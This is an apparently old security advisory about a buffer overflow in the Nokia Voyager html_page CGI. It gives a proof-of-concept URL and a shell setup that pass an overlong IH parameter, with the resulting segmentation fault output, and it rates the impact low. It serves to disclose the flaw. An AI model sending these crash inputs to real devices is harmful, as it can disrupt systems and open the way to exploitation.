Vulnerability

    Nokia Voyager

Affected

    Nokia Voyager

Description

    Gregory  Duchemin   found  following.    Voyager   works  with   a
    multipurposes cgi called  html_page that make  a call to  html_gen
    with a filename as a template script.  Html_gen produce the  final
    html page returned by apache.  If You test this kind of URL:

        http://your-nokia/http://10.1.152.2/cgi-bin/html_page?TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    You'll get a  segfault error page.   If u test  it with a  command
    line, You'll reproduce  the same signal.   Obviously, html_gen  is
    unable to  manage properly  a big  amount a  data in  some of  its
    parameters. IH is one of the html_page's paramaters that does  the
    job.

    With telnet, try (under tcsh)

        #setenv QUERY_STRING
        "TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        #/web/cgi-bin/html_page

        Content-type: text/html

        <br>Html_gen exited because of signal:  Segmentation fault<br>
        nokia1[admin]#

Solution

    Because  u  already  must  be  administrator to access the voyager
    setup, security impact is relatively low considering that  default
    configuration wasn't poorly modified.

    Because nokia ipso isn't dedicated for a multi-user work usage and
    noone else root should be able to login, impact for local  rooting
    is low too considering the same things that above.